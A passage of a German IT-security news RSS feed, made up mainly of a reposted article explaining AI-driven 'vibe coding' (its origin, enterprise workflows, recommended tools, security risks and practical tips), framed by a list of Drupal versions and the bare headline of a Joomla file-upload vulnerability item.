            <li>Drupal 9.0.2</li>
        
            <li>Drupal 9.0.3</li>
        
            <li>Drupal 9.0.4</li>
        
            <li>Drupal 9.0.5</li>
        
            <li>Drupal 9.0.6</li>
        
            <li>Drupal 9.0.7</li>
        
            <li>Drupal 9.0.8</li>
        
            <li>Drupal 9.0.9</li>
        
            <li>Drupal 9.0.10</li>
        
            <li>Drupal 9.0.11</li>
        
            <li>Drupal 9.0.12</li>
        
            <li>Drupal 9.0.13</li>
        
            <li>Drupal 9.0.14</li>
        
            <li>Drupal 9.1.0</li>
        
            <li>Drupal 9.1.1</li>
        
            <li>Drupal 9.1.2</li>
        
            <li>Drupal 9.1.3</li>
        
            <li>Drupal 9.1.4</li>
        
            <li>Drupal 9.1.5</li>
        
            <li>Drupal 9.1.6</li>
        
            <li>Drupal 9.1.7</li>
        
            <li>Drupal 9.1.8</li>
        
            <li>Drupal 9.1.9</li>
        
            <li>Drupal 9.1.10</li>
        
            <li>Drupal 9.1.11</li>
        
            <li>Drupal 9.1.12</li>
        
            <li>Drupal 9.1.13</li>
        
            <li>Drupal 9.1.14</li>
        
            <li>Drupal 9.1.15</li>
        
            <li>Drupal 9.2.0</li>
        
            <li>Drupal 9.2.1</li>
        
            <li>Drupal 9.2.2</li>
        
            <li>Drupal 9.2.3</li>
        
            <li>Drupal 9.2.4</li>
        
            <li>Drupal 9.2.5</li>
        
            <li>Drupal 9.2.6</li>
        
            <li>Drupal 9.2.7</li>
        
            <li>Drupal 9.2.8</li>
        
            <li>Drupal 9.2.9</li>
        
            <li>Drupal 9.2.10</li>
        
            <li>Drupal 9.2.11</li>
        
            <li>Drupal 9.2.12</li>
        
            <li>Drupal 9.2.13</li>
        
            <li>Drupal 9.2.14</li>
        
            <li>Drupal 9.2.15</li>
        
            <li>Drupal 9.2.16</li>
        
            <li>Drupal 9.2.17</li>
        
            <li>Drupal 9.2.18</li>
        
            <li>Drupal 9.2.19</li>
        
            <li>Drupal 9.2.20</li>
        
            <li>Drupal 9.2.21</li>
        
            <li>Drupal 9.3.0</li>
        
            <li>Drupal 9.3.1</li>
        
            <li>Drupal 9.3.2</li>
        
            <li>Drupal 9.3.3</li>
        
            <li>Drupal 9.3.4</li>
        
            <li>Drupal 9.3.5</li>
        
            <li>Drupal 9.3.6</li>
        
            <li>Drupal 9.3.7</li>
        
            <li>Drupal 9.3.8</li>
        
            <li>Drupal 9.3.9</li>
        
            <li>Drupal 9.3.10</li>
        
            <li>Drupal 9.3.11</li>
        
            <li>Drupal 9.3.12</li>
        
            <li>Drupal 9.3.13</li>
        
            <li>Drupal 9.3.14</li>
        
            <li>Drupal 9.3.15</li>
        
            <li>Drupal 9.3.16</li>
        
            <li>Drupal 9.3.17</li>
        
            <li>Drupal 9.3.18</li>
        
            <li>Drupal 9.3.19</li>
        
            <li>Drupal 9.3.20</li>
        
            <li>Drupal 9.3.21</li>
        
            <li>Drupal 9.3.22</li>
        
            <li>Drupal 9.4.0</li>
        
            <li>Drupal 9.4.1</li>
        
            <li>Drupal 9.4.2</li>
        
            <li>Drupal 9.4.3</li>
        
            <li>Drupal 9.4.4</li>
        
            <li>Drupal 9.4.5</li>
        
            <li>Drupal 9.4.6</li>
        
            <li>Drupal 9.4.7</li>
        
            <li>Drupal 9.4.8</li>
        
            <li>Drupal 9.4.9</li>
        
            <li>Drupal 9.4.10</li>
        
            <li>Drupal 9.4.11</li>
        
            <li>Drupal 9.4.12</li>
        
            <li>Drupal 9.4.13</li>
        
            <li>Drupal 9.4.14</li>
        
            <li>Drupal 9.4.15</li>
        
            <li>Drupal 9.5.0</li>
        
            <li>Drupal 9.5.1</li>
        
            <li>Drupal 9.5.2</li>
        
            <li>Drupal 9.5.3</li>
        
            <li>Drupal 9.5.4</li>
        
            <li>Drupal 9.5.5</li>
        
            <li>Drupal 9.5.6</li>
        
            <li>Drupal 9.5.7</li>
        
            <li>Drupal 9.5.8</li>
        
            <li>Drupal 9.5.9</li>
        
            <li>Drupal 9.5.10</li>
        
            <li>Drupal 9.5.11</li>
        
            <li>Drupal 10.0.0</li>
        
            <li>Drupal 10.0.1</li>
        
            <li>Drupal 10.0.2</li>
        
            <li>Drupal 10.0.3</li>
        
            <li>Drupal 10.0.4</li>
        
            <li>Drupal 10.0.5</li>
        
            <li>Drupal 10.0.6</li>
        
            <li>Drupal 10.0.7</li>
        
            <li>Drupal 10.0.8</li>
        
            <li>Drupal 10.0.9</li>
        
            <li>Drupal 10.0.10</li>
        
            <li>Drupal 10.0.11</li>
        
            <li>Drupal 10.1.0</li>
        
            <li>Drupal 10.1.1</li>
        
            <li>Drupal 10.1.2</li>
        
            <li>Drupal 10.1.3</li>
        
            <li>Drupal 10.1.4</li>
        
            <li>Drupal 10.1.5</li>
        
            <li>Drupal 10.1.6</li>
        
            <li>Drupal 10.1.7</li>
        
            <li>Drupal 10.1.8</li>
        
            <li>Drupal 10.2.0</li>
        
            <li>Drupal 10.2.1</li>
        
            <li>Drupal 10.2.2</li>
        
            <li>Drupal 10.2.3</li>
        
            <li>Drupal 10.2.4</li>
        
            <li>Drupal 10.2.5</li>
        
            <li>Drupal 10.2.6</li>
        
            <li>Drupal 10.2.7</li>
        
            <li>Drupal 10.2.8</li>
        
            <li>Drupal 10.2.9</li>
        
            <li>Drupal 10.2.10</li>
        
            <li>Drupal 10.2.11</li>
        
            <li>Drupal 10.2.12</li>
        
            <li>Drupal 10.3.0</li>
        
            <li>Drupal 10.3.1</li>
        
            <li>Drupal 10.3.2</li>
        
            <li>Drupal 10.3.3</li>
        
            <li>Drupal 10.3.4</li>
        
            <li>Drupal 10.3.5</li>
        
            <li>Drupal 10.3.6</li>
        
            <li>Drupal 10.3.7</li>
        
            <li>Drupal 10.3.8</li>
        
            <li>Drupal 10.3.9</li>
        
            <li>Drupal 10.3.10</li>
        
            <li>Drupal 10.3.11</li>
        
            <li>Drupal 10.3.12</li>
        
            <li>Drupal 10.3.13</li>
        
            <li>Drupal 10.3.14</li>
        
            <li>Drupal 10.4.0</li>
        
            <li>Drupal 10.4.1</li>
        
            <li>Drupal 10.4.2</li>
        
            <li>Drupal 10.4.3</li>
        
            <li>Drupal 10.4.4</li>
        
            <li>Drupal 10.4.5</li>
        
            <li>Drupal 10.4.6</li>
        
            <li>Drupal 10.4.7</li>
        
            <li>Drupal 10.4.8</li>
        
            <li>Drupal 10.4.9</li>
        
            <li>Drupal 10.4.10</li>
        
            <li>Drupal 10.5.0</li>
        
            <li>Drupal 10.5.1</li>
        
            <li>Drupal 10.5.2</li>
        
            <li>Drupal 10.5.3</li>
        
            <li>Drupal 10.5.4</li>
        
            <li>Drupal 10.5.5</li>
        
            <li>Drupal 10.5.6</li>
        
            <li>Drupal 10.5.7</li>
        
            <li>Drupal 10.5.8</li>
        
            <li>Drupal 10.5.9</li>
        
            <li>Drupal 10.5.10</li>
        
            <li>Drupal 10.5.11</li>
        
            <li>Drupal 10.5.12</li>
        
            <li>Drupal 10.6.0</li>
        
            <li>Drupal 10.6.1</li>
        
            <li>Drupal 10.6.2</li>
        
            <li>Drupal 10.6.3</li>
        
            <li>Drupal 10.6.4</li>
        
            <li>Drupal 10.6.5</li>
        
            <li>Drupal 10.6.6</li>
        
            <li>Drupal 10.6.7</li>
        
            <li>Drupal 10.6.8</li>
        
            <li>Drupal 10.6.9</li>
        
            <li>Drupal 10.6.10</li>
        
            <li>Drupal 10.6.11</li>
        
            <li>Drupal 10.6.12</li>
        
            <li>Drupal 11.0.0</li>
        
            <li>Drupal 11.0.1</li>
        
            <li>Drupal 11.0.2</li>
        
            <li>Drupal 11.0.3</li>
        
            <li>Drupal 11.0.4</li>
        
            <li>Drupal 11.0.5</li>
        
            <li>Drupal 11.0.6</li>
        
            <li>Drupal 11.0.7</li>
        
            <li>Drupal 11.0.8</li>
        
            <li>Drupal 11.0.9</li>
        
            <li>Drupal 11.0.10</li>
        
            <li>Drupal 11.0.11</li>
        
            <li>Drupal 11.0.12</li>
        
            <li>Drupal 11.0.13</li>
        
            <li>Drupal 11.1.0</li>
        
            <li>Drupal 11.1.1</li>
        
            <li>Drupal 11.1.2</li>
        
            <li>Drupal 11.1.3</li>
        
            <li>Drupal 11.1.4</li>
        
            <li>Drupal 11.1.5</li>
        
            <li>Drupal 11.1.6</li>
        
            <li>Drupal 11.1.7</li>
        
            <li>Drupal 11.1.8</li>
        
            <li>Drupal 11.1.9</li>
        
            <li>Drupal 11.1.10</li>
        
            <li>Drupal 11.2.0</li>
        
            <li>Drupal 11.2.1</li>
        
            <li>Drupal 11.2.2</li>
        
            <li>Drupal 11.2.3</li>
        
            <li>Drupal 11.2.4</li>
        
            <li>Drupal 11.2.5</li>
        
            <li>Drupal 11.2.6</li>
        
            <li>Drupal 11.2.7</li>
        
            <li>Drupal 11.2.8</li>
        
            <li>Drupal 11.2.9</li>
        
            <li>Drupal 11.2.10</li>
        
            <li>Drupal 11.2.11</li>
        
            <li>Drupal 11.2.12</li>
        
            <li>Drupal 11.2.13</li>
        
            <li>Drupal 11.2.14</li>
        
            <li>Drupal 11.3.0</li>
        
            <li>Drupal 11.3.1</li>
        
            <li>Drupal 11.3.2</li>
        
            <li>Drupal 11.3.3</li>
        
            <li>Drupal 11.3.4</li>
        
            <li>Drupal 11.3.5</li>
        
            <li>Drupal 11.3.6</li>
        
            <li>Drupal 11.3.7</li>
        
            <li>Drupal 11.3.8</li>
        
            <li>Drupal 11.3.9</li>
        
            <li>Drupal 11.3.10</li>
        
            <li>Drupal 11.3.11</li>
        
            <li>Drupal 11.3.12</li>
        
            <li>Drupal 11.3.13</li>
        
            <li>Drupal 11.4.0</li>
        
            <li>Drupal 11.4.1</li>
        
            <li>Drupal 11.4.2</li>
        
            <li>Drupal 11.4.3</li>
        
    </ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vibe Coding erklärt]]></title>
<description><![CDATA[Vibe Coding verspricht viele KI-getriebene Vorteile, macht Softwareentwickler jedoch nicht überflüssig – eher im Gegenteil.Fit Ztudio | shutterstock.com



Im Dev-Umfeld verschwimmt die Grenze zwischen Programmieren und Prompten schon seit einigen Jahren. Auf die Spitze getrieben wird diese Entwi...]]></description>
<link>https://tsecurity.de/de/3680298/it-security-nachrichten/vibe-coding-erklaert/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680298/it-security-nachrichten/vibe-coding-erklaert/</guid>
<pubDate>Mon, 20 Jul 2026 07:54:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/11/Fit-Ztudio_shutterstock_2642655115_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Code Review Dev 16z9" class="wp-image-4086782" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Vibe Coding verspricht viele KI-getriebene Vorteile, macht Softwareentwickler jedoch nicht überflüssig – eher im Gegenteil.</figcaption></figure><p class="imageCredit">Fit Ztudio | shutterstock.com</p></div>



<p class="wp-block-paragraph">Im Dev-Umfeld verschwimmt die Grenze zwischen Programmieren und Prompten schon seit einigen Jahren. Auf die Spitze getrieben wird diese Entwicklung vom <a href="https://www.computerwoche.de/article/3854442/vibe-coding-im-selbstversuch.html" target="_blank">Vibe-Coding-Trend</a>: Frühe KI-Entwickler-Tools wie GitHub Copilot waren vornehmlich darauf ausgelegt, Devs zu unterstützen. Etwa, indem sie Funktionen und Syntax ergänzten oder Boilerplate-Code aus Kommentaren generierten. Kommt ein Vibe-Coding-Ansatz zum Zug, beginnen <a href="https://www.computerwoche.de/article/2818958/was-developer-an-ihrem-job-lieben-und-hassen.html" target="_blank">menschliche Entwickler</a> hingegen gar nicht erst damit, Code zu schreiben.</p>



<p class="wp-block-paragraph">Dieses Konzept führt nicht nur zu veränderten Workflows, sondern erfordert auch, ein neues Mindset. Schließlich wird die Programmierarbeit mit <a href="https://www.computerwoche.de/article/4052859/github-spark-im-vibe-coding-test.html" target="_blank">Vibe Coding</a> eher zu einer Art Live-Prototyping. In diesem Artikel lesen Sie:</p>



<ul class="wp-block-list">
<li>warum Vibe Coding Vibe Coding heißt,</li>



<li>inwieweit sich dieser Ansatz für Unternehmen eignet,</li>



<li>wie Vibe-Coding-Workflows konkret aussehen (können),</li>



<li>welche Tools in diesem Bereich zu empfehlen sind,</li>



<li>welche Risiken Sie dabei auf dem Schirm haben sollten, sowie</li>



<li>Tipps dazu, wie Sie Vibe Coding effektiv in der Praxis umsetzen.</li>
</ul>



<h2 class="wp-block-heading">Vibe Coding – Begriffsdefinition</h2>



<p class="wp-block-paragraph">Der Begriff Vibe Coding wurde Anfang 2025 vom OpenAI-Mitbegründer <a href="https://www.linkedin.com/in/andrej-karpathy-9a650716/" target="_blank" rel="noreferrer noopener">Andrej Karpathy</a> geprägt. Der KI-Experte trat den Trend mit einem Post auf dem Kurznachrichtendienst X los.</p>



<figure class="wp-block-embed is-type-rich is-provider-x wp-block-embed-x"><div class="wp-block-embed__wrapper youtube-video">
<blockquote class="twitter-tweet" data-width="500" data-dnt="true"><p lang="en" dir="ltr">There's a new kind of coding I call "vibe coding", where you fully give in to the vibes, embrace exponentials, and forget that the code even exists. It's possible because the LLMs (e.g. Cursor Composer w Sonnet) are getting too good. Also I just talk to Composer with SuperWhisper…</p>— Andrej Karpathy (@karpathy) <a href="https://x.com/karpathy/status/1886192184808149383?ref_src=twsrc%5Etfw">February 2, 2025</a></blockquote>
</div></figure>



<p class="wp-block-paragraph">In diesem beschreibt Karpathy die Vibe-Coding-Methodik als eine neue Coding-Form, bei der man sich ganz den “Vibes” hingibt und vergisst, dass der Code überhaupt existiert. <a href="https://shadowdragon.io/author/amy-mshadowdragon-io/" target="_blank" rel="noreferrer noopener">Amy Mortlock</a>, Vice President of Marketing beim <a href="https://www.computerwoche.de/article/2795282/wie-viel-wissen-hacker-ueber-sie.html" target="_blank">OSINT</a>-Spezialisten ShadowDragon, erklärt das Konzept etwas weniger kryptisch: “Beim Vibe Coding beschreibt man in natürlicher Sprache, was man möchte, und die KI generiert dann die gesamte Anwendung und kümmert sich um alle technischen Details.”</p>



<p class="wp-block-paragraph">Vibe Coding setzt also darauf, die traditionelle Programmierarbeit durch dialogorientierte Anweisungen und <a href="https://www.computerwoche.de/article/4026379/ki-jobs-diese-skills-brauchen-entwickler.html" target="_blank">Kooperation mit einem KI-Assistenten</a> zu ersetzen. Statt detaillierte Spezifikationen zu entwerfen und diese an die Engineers weiterzugeben, können Produktmanager, Fachexperten – oder jeder andere, der eine Idee hat – in einfacher Sprache beschreiben, wie das Ergebnis aussehen soll. Die KI-Software erledigt dem Rest in Echtzeit. Allerdings geht es dabei weniger darum, die Softwareentwicklung durchgängig zu automatisieren.</p>



<p class="wp-block-paragraph">Vielmehr stehen Mindset-Veränderungen im Fokus: Warum sollte man nicht der KI die Mechanik überlassen und sich stattdessen auf die Ausrichtung, das Feedback, den Flow und die “Vibes” konzentrieren? Schließlich werden die Modelle, die Tools wie <a href="https://www.infoworld.com/article/4081431/cursor-2-0-adds-coding-model-ui-for-parallel-agents.html" target="_blank">Cursor</a> oder GitHub Copilot zugrunde liegen, immer performanter. Deswegen sehen auch viele Developer ihre Arbeit inzwischen vorwiegend als einen Dialog mit der KI – statt sich zeilenweise selbst durch Syntax zu wühlen.</p>



<p class="wp-block-paragraph">Und obwohl auch bei einem Vibe-Coding-Ansatz diverse <a href="https://www.computerwoche.de/article/4034385/9-wege-mit-vibe-coding-zu-scheitern.html" target="_blank">Probleme und Herausforderungen</a> auf den Plan treten können (dazu später mehr): Die Technik gewinnt zunehmend an Popularität – auch im Unternehmensumfeld.</p>



<h2 class="wp-block-heading">Vibe Coding im Unternehmen</h2>



<p class="wp-block-paragraph">Wie das in der Praxis konkret aussieht, beschreibt <a href="https://www.linkedin.com/in/charlesjiama/" target="_blank" rel="noreferrer noopener">Charles Ma</a>, Softwareentwickler beim Observability-Spezialisten Chronosphere: “Viele unserer Entwickler nutzen Tools wie Cursor und <a href="https://www.computerwoche.de/article/4182911/claude-code-hat-ein-sicherheitsproblem.html" target="_blank">Claude Code</a>. Wir fördern deren Einsatz sogar über ein Nutzungs-Leaderboard. Dabei betrachten wir die Tools jedoch als Assistenten, nicht als Dev-Ersatz. Unser Code-Review-Prozess ist weiterhin Pflicht für jeden Produktionscode – und wir sehen eher davon ab, viele unserer oder gar externe Tools mit KI zu verbinden.”</p>



<p class="wp-block-paragraph">In der Perspektive von <a href="https://www.linkedin.com/in/achint-agarwal-a853241" target="_blank" rel="noreferrer noopener">Achint Agarwal</a>, Vice President of Product beim KI-Anbieter Pramata, hat Vibe Coding vor allem die Art und Weise verändert, wie Teams vom Konzept zum Prototyp gelangen: “Früher mussten UI/UX-Designer und Entwickler zusammenarbeiten, um eine Idee in etwas zu verwandeln, mit dem Kunden interagieren konnten. Dieser Prozess konnte leicht mehrere Wochen dauern und diverse Überarbeitungsrunden umfassen.”</p>



<p class="wp-block-paragraph">Heute, so Agarwal, könne ein Produktmanager oder Fachexperte einfach in <a href="https://www.computerwoche.de/article/2799474/was-ist-natural-language-processing.html" target="_blank">natürlicher Sprache</a> formulieren, was er sich vorstellt, und die KI generiere funktionierenden Code in <a href="https://www.computerwoche.de/article/2785190/prototyping-hilft-bei-der-softwareentwicklung.html" target="_blank">Prototyp-Qualität</a>. “Bei dieser Veränderung geht es um mehr als nur Geschwindigkeit: Auch die Qualität der Ergebnisse ist besser, weil die Person, die den Anforderungen am nächsten steht, während des gesamten Prozesses die Kontrolle behält und es keine Reibungsverluste durch Übergaben gibt”, fügt der Manager hinzu.</p>



<p class="wp-block-paragraph">Auch Agarwal sieht in Vibe Coding kein Substitut für die traditionelle <a href="https://www.computerwoche.de/article/4016035/6-trends-wie-ki-die-softwareentwicklung-verandert.html" target="_blank">Softwareentwicklung</a>, sondern vor allem ein Explorations- und Validierungs-Tool: “Dev-Teams ist es damit möglich, in kurzer Zeit funktionierende Prototypen zu erstellen, diese mit Kunden zu testen und zu überprüfen, ob die Idee sinnvoll ist. Fällt diese Prüfung positiv aus, kann der Prototyp an die Engineers gehen, die ihn mit Blick auf Skalierbarkeit, Sicherheit und langfristige Integrationen weiter ausbauen.”</p>



<h2 class="wp-block-heading">Wie sieht ein Vibe-Coding-Workflow aus?</h2>



<p class="wp-block-paragraph">Es gibt keine allgemeingültige Blaupause für Vibe Coding. Entsprechend gehen auch die Ansichten darüber auseinander, wie ein typischer Vibe-Coding-Workflow aussieht. <a href="https://www.linkedin.com/in/kostaspardalis/" target="_blank" rel="noreferrer noopener">Kostas Pardalis</a>, Data Infrastructure Engineer beim KI-Lösungsanbieter Typedef, beschreibt diesen als agilen, vierstufigen Prozess:</p>



<ul class="wp-block-list">
<li>die <strong>Erkundungsphase</strong>, in der der “Vibe”, der Zweck und die Einschränkungen definiert werden.</li>



<li>die <strong>Gestaltungsphase</strong>, in der ein funktionierender Prototyp erstellt und verfeinert wird.</li>



<li>die <strong>Grounding-Phase</strong>, die genutzt wird, um Struktur und Datenintegrität hinzuzufügen.</li>



<li>die <strong>Operationalisierungsphase</strong>, in der Versionierung, Evaluierung und Governance hinzukommen.</li>
</ul>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/steve-croce-1060082/" target="_blank" rel="noreferrer noopener">Steve Croce</a>, Field CTO beim Open-Source-Unternehmen Anaconda, steht hingegen auf dem Standpunkt, dass der Vibe-Coding-Workflow davon abhängig ist, ob ein Prototyp, eine Zwischenlösung oder eine vollständige Produktionsapplikation entwickelt werden soll. Basierend darauf, orientiert sich der Vibe-Coding-Workflow in der Vision des Technologieentscheiders eher am traditionellen Software Development Lifecycle – fußt jedoch ebenfalls auf vier Stufen:</p>



<ul class="wp-block-list">
<li>In der Phase der <strong>Planungs- und Anforderungsanalyse</strong> könnten Produktmanager und UX-Teams demnach voll und ganz auf Vibe Coding setzen und so vor der formellen Entwicklung klickbare Prototypen und Machbarkeitstests erstellen.</li>



<li>Im Rahmen der<strong> Design-Phase </strong>kann KI laut Croce dabei unterstützen, Architekturen und <a href="https://www.computerwoche.de/a/4077044" target="_blank">Dokumentationen zu erstellen</a>. Der Manager weist allerdings darauf hin, dass es in dieser Phase auch hilfreich sein könne, erfahrene Engineers oder Architekten hinzuziehen, um die Einhaltung von Standards und die Reusability interner Systeme zu gewährleisten.</li>



<li>Als Kernbereich der Vibe-Coding-Experience sieht Croce die<strong> Implementierungs- und Testphase:</strong> Ein KI-Agent könne an dieser Stelle die gesamte Anwendung erstellen und darüber hinaus auch Repositories strukturieren und <a href="https://www.computerwoche.de/article/2804460/installationen-und-funktionstests-automatisieren.html" target="_blank">Tests durchführen</a>. Der Experte rät Unternehmens-Teams jedoch mit Blick auf die Testabdeckung und Konformitätsprüfungen auch in dieser Phase dazu, menschliche Profis hinzuzuziehen.</li>



<li>In der <strong>Bereitstellungs- und Wartungsphase </strong>könne KI laut dem CTO dazu genutzt werden, Apps bereitzustellen und zu warten. Dieser Part könne jedoch auch vollständig außerhalb der Vibe-Coding-Erfahrung abgewickelt werden, um den Unternehmensanforderungen zu entsprechen, so Croce.</li>
</ul>



<h2 class="wp-block-heading">Empfehlenswerte Vibe-Coding-Tools</h2>



<p class="wp-block-paragraph">Vibe-Coding-Tools decken ein breites Spektrum ab: Vom leicht zugänglichen, dialogorientierten Builder für nicht-technische Teams, bis hin zu integrierten Entwicklungsumgebungen (<a href="https://www.computerwoche.de/article/2827615/4-entwicklungsumgebungen-fuer-pythonistas.html" target="_blank">IDEs</a>), die Engineers umfassende Kontrollmöglichkeiten bieten und zuverlässige Anwendungen gewährleisten. Die Wahl des richtigen Tools hängt von den Fähigkeiten des Teams, dem Projektziel und dem benötigten Maß an Governance ab.</p>



<p class="wp-block-paragraph">Eine kleine Auswahl empfehlenswerter Tools für Vibe-Coding-Zwecke:</p>



<ul class="wp-block-list">
<li><a href="https://cursor.com/" target="_blank" rel="noreferrer noopener"><strong>Cursor</strong></a> ist eine KI-integrierte IDE, mit der sich mehrere Dateien bearbeiten lassen.</li>



<li><a href="https://replit.com/" target="_blank" rel="noreferrer noopener"><strong>Replit</strong></a> ist eine gute Wahl für Browser-basierte Entwicklungsarbeit.</li>



<li><a href="https://bolt.new/" target="_blank" rel="noreferrer noopener"><strong>Bolt</strong> </a>und <a href="https://lovable.dev/" target="_blank" rel="noreferrer noopener"><strong>Lovable</strong></a> sind Builder, eignen sich vor allem für schnelles Brainstorming und zeichnen sich durch überschaubaren technischen Aufwand aus. Diese Tools sind daher auch für Einsteiger geeignet.</li>



<li><a href="https://windsurf.com/" target="_blank" rel="noreferrer noopener"><strong>Windsurf</strong></a> und <a href="https://zed.dev/" target="_blank" rel="noreferrer noopener"><strong>Zed</strong></a> sind vollständige IDEs, die darauf ausgelegt sind, Vibe-Coding-Funktionen in traditionelle Dev-Umgebungen zu integrieren.</li>
</ul>



<h2 class="wp-block-heading">Diese Risiken birgt Vibe Coding</h2>



<p class="wp-block-paragraph">Trotz der genannten Vorteile birgt der Vibe-Coding-Ansatz auch diverse Risiken mit Blick auf die Wartbarkeit und Anfälligkeit der generierten Logik. So warnt etwa ShadowDragon-Managerin Mortlock: “<a href="https://www.computerwoche.de/article/4155663/6-wege-uber-ki-gehackt-zu-werden.html" target="_blank">Sicherheitslücken</a> und <a href="https://www.computerwoche.de/article/3980660/technische-schulden-als-billige-ausrede.html" target="_blank">technische Schulden</a> sind die Hauptprobleme in Zusammenhang mit Vibe Coding. KI kann manchmal unsichere Pattern oder auch veraltete Bibliotheken einbinden.”</p>



<p class="wp-block-paragraph">Zudem sei KI-generierter Code in den meisten Fällen auch länger, was das Debugging langwierig und mühsam gestalten könne, erklärt Mortlock. Sie fügt hinzu: “KI verweist unter Umständen auch auf nicht existierende Packages, was auch böswillige Akteure ausnutzen könnten. Was wie funktionierender Code aussieht, kann versteckte Fallen bergen.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/charlesjiama/" target="_blank" rel="noreferrer noopener">Charles Ma</a>, Software Engineer beim Observability-Spezialisten Chronosphere, sieht ein weiteres Problem, das die Angriffsfläche potenziell vergrößert: “Selbst erfahrene Engineers können selbstzufrieden werden und dann Probleme übersehen, die ihnen sonst nicht entgangen wären. Sobald KI-Tools mit externen Systemen verbunden sind oder Websuchen durchführen, besteht außerdem das Risiko von Prompt Injections und Toolchain-Exploits.”</p>



<p class="wp-block-paragraph">Infrastruktur-Profi Pardalis fokussiert mit Blick auf die Risiken von Vibe Coding vor allem die Bereiche Volatilität und Sichtbarkeit: Weil dieser Ansatz für schnelle Iterationen und Modellautonomie förderlich sei, bestünden die Hauptrisiken in unkontrollierter Variabilität und undurchsichtigen Quellen. Um diese Probleme zu bekämpfen, appelliert Pardalis für:</p>



<ul class="wp-block-list">
<li><strong>Lineage Tracking</strong>: Jede Version wird committet und verwendet Frameworks mit integrierter Traceability.</li>



<li><strong>Evaluierungsschleifen</strong>: Qualitäts- und Regressionsprüfungen werden automatisiert durchgeführt.</li>



<li><strong>Governance-Layer</strong>: Prompt-Historien werden auditiert und sensible Daten gefiltert.</li>
</ul>



<p class="wp-block-paragraph">Der Engineering-Profi ist der Ansicht, dass eine expressive, modellgesteuerte Softwareentwicklung und eine deterministische Infrastruktur unter disziplinierten Rahmenbedingungen koexistieren können: “Letztendlich verspricht Vibe Coding kein Chaos, sondern strukturierte Kreativität. Sie entwickeln Ideen schnell, setzen sie aber sicher um. Mit anderen Worten: Freiheit am Anfang, Disziplin im weiteren Verlauf – so kann Vibe Coding tatsächlich in Produktionsumgebungen skaliert werden.”</p>



<h2 class="wp-block-heading">6 Tipps für effektives Vibe Coding</h2>



<p class="wp-block-paragraph">Da Sie nun umfassend über alle Aspekte des Vibe-Coding-Ansatzes informiert sind, geben wir Ihnen abschließend noch ein paar Tipps an die Hand, um Ihre eigene Initiative erfolgreich umzusetzen. Diese haben wir aus unseren Gesprächen mit den im Artikel zitierten Spezialisten zum Thema extrahiert</p>



<ul class="wp-block-list">
<li><strong>Beginnen Sie mit Zielen, nicht mit Funktionen:</strong> Beschreiben Sie zunächst die gewünschte <a href="https://www.computerwoche.de/article/2834420/der-niedergang-des-user-interface.html" target="_blank">User Experience</a> und die wesentlichen Geschäftsprobleme, die mit der Initiative gelöst werden sollen. Dabei müssen Sie es nicht übertreiben und jeden Button oder Screen definieren – für relevante Lösungen ist es entscheidend, der KI so genau wie möglich zu beschreiben, was erreicht werden soll.</li>



<li><strong>Planen Sie voraus:</strong> Vibe Coding ist nicht in der Lage, eine gute Architektur zu ersetzen. Bevor Sie KI hinzuziehen, sollten Sie deshalb sicherstellen, dass Design und Spezifikationen stimmen. Das erleichtert es der KI, “Intent” in kohärente Systeme zu übersetzen.  </li>



<li><strong>Verstehen Sie KI als Partner: </strong>Es gilt, mit Vibe-Coding-Tools zu kollaborieren. Diese Werkzeuge brauchen Anleitung und ihre Ergebnisse müssen überprüft werden. Blindes Vertrauen kann an dieser Stelle<a href="https://www.computerwoche.de/article/3829267/so-bleibt-ihr-code-halluzinationsfrei.html" target="_blank"> kontraproduktiv sein</a>. Sie sollten deshalb nicht zögern, die KI-generierte Logik in Frage zu stellen.</li>



<li><strong>Nutzen Sie Frameworks, Kontext und Beispiele:</strong> Etablierte Frameworks zu nutzen, erspart es Ihnen alles von Grund auf neu zu entwickeln. Die KI mit Beispielanwendungen zu füttern oder (<a href="https://www.computerwoche.de/article/4143599/mcp-server-5-tipps-fur-die-praxis.html" target="_blank">vertrauenswürdige</a>) MCP-Server hinzuzuziehen, um Kontext in größeren Projekten zu managen, kann ihre Fähigkeiten erweitern.  </li>



<li><strong>Halten Sie Menschen – und Security – im Loop:</strong> Setzen Sie auch bei Vibe- respektive KI-Coding-Tools auf das Least-Privilege-Prinzip – und Review-Prozesse. Engineering Best Practices anzuwenden, empfiehlt sich ebenfalls: Generieren Sie Tests, verifizieren Sie Funktionalitäten. Und betrachten Sie die Tools als Kreativitäts- und Produktivitäts-Support. Nicht als Substitut für <a href="https://www.computerwoche.de/article/2834999/3-dinge-die-senior-developer-auszeichnen.html" target="_blank">Skills und Knowhow</a>.</li>



<li><strong>Iterieren und verfeinern Sie: </strong>Nehmen Sie mit Blick auf Vibe Coding Abstand vom Streben nach Perfektion (auch wenn es Ihnen <a href="https://www.computerwoche.de/article/4048410/was-junior-entwickler-von-the-bear-lernen-konnen.html" target="_blank">widerstrebt</a>) und finden Sie sich möglichst frühzeitig mit unvollkommenen Ergebnissen ab. Tracken Sie Prompts, cachen Sie Checkpoints und verfeinern Sie die Ergebnisse – solange, bis der “Flow” zu einer zuverlässigen Funktionalität wird.</li>
</ul>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel ist <a href="https://www.infoworld.com/article/4078884/what-is-vibe-coding-ai-writes-the-code-so-developers-can-think-big.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Infoworld.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Joomla Page Builder CK < = 3.5.10 - Unauthenticated Arbitrary File Upload (RCE)]]></title>
